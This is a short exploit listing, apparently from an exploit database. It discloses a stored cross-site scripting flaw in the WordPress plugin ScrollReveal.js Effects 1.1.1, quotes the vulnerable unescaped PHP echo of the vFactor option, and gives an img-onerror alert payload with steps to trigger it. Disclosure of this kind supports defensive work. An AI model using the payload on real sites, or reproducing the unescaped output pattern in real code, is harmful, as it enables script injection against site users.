Exploit for WordPress ScrollReveal.js Effects 1.1.1 Cross Site Scripting

## https://sploitus.com/exploit?id=PACKETSTORM:166820
# Exploit Title: WordPress Plugin ScrollReveal.js Effects - Stored Cross Site Scripting  
# Date: 25-04-2022  
# Exploit Author: Mariam Tariq - Hunt3rsherlock_  
# Vendor Homepage: https://wordpress.org/plugins/scrollrevealjs-effects/  
# Version: 1.1.1  
# Tested on: Firefox  
# Contact me: mariamtariq404@gmail.com  
# Vulnerable Code:  
```  
<input id="src-opacity" type="text" name="sr_config[vFactor]" value="<?php  
echo $options['vFactor']; ?>" placeholder="Element ratio in float" />  
```  
# POC  
1. Install ScrollReveal.js Effects WordPress plugin and activate.  
2. Go to configuration and on vFactor field inject XSS payload “><img src=x  
onerror=alert(‘’XSS>  
3. XSS will trigger.  
  
## PoC Image  
https://imgur.com/a/uQRT2mD  
https://imgur.com/1BB80ep